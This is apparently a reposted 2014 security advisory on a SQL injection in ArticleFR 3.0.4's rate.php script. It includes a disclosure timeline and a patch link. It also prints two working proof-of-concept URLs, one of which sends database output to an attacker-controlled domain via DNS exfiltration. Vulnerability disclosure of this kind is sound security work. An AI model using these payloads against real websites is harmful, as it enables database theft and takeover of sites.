Lucene search

K
zdtHigh-Tech Bridge1337DAY-ID-22537
HistoryAug 20, 2014 - 12:00 a.m.

ArticleFR 3.0.4 SQL Injection Vulnerability

2014-08-2000:00:00
High-Tech Bridge
0day.today
30

0.001 Low

EPSS

Percentile

36.2%

ArticleFR version 3.0.4 suffers from a remote SQL injection vulnerability.

Product: ArticleFR
Vendor: Free Reprintables
Vulnerable Version(s): 3.0.4 and probably prior
Tested Version: 3.0.4
Advisory Publication:  July 23, 2014  [without technical details]
Vendor Notification: July 23, 2014 
Public Disclosure: August 20, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-5097
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website.


1) SQL Injection in ArticleFR: CVE-2014-5097

The vulnerability exists due to insufficient sanitization of the "id" HTTP GET parameter passed to "/rate.php" script, when "act" HTTP GET parameter is set to either "get" or "set". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application’s database. 

The following exploitation example demonstrates vulnerability when "act" HTTP GET parameter is set to value "get". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202

Below is another exploitation example, which displays version of MySQL server when "act" HTTP GET parameter is set to value "set":

http://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20--%202

-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2014-07-23 Vendor Alerted via emails.
2014-07-31 Vendor Alerted via emails.
2014-07-31 Issue created on GitHub.
2014-08-04 Vendor closed issue on GitHub.
2014-08-04 Vendor locked and limited conversation to collaborators on GitHub.
2014-08-07 Fix Requested via emails.
2014-08-11 Fix Requested via emails.
2014-08-18 Fix Requested via emails.
2014-08-20 Public disclosure with self-written patch.

Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23225-patch.zip

#  0day.today [2018-04-05]  #

0.001 Low

EPSS

Percentile

36.2%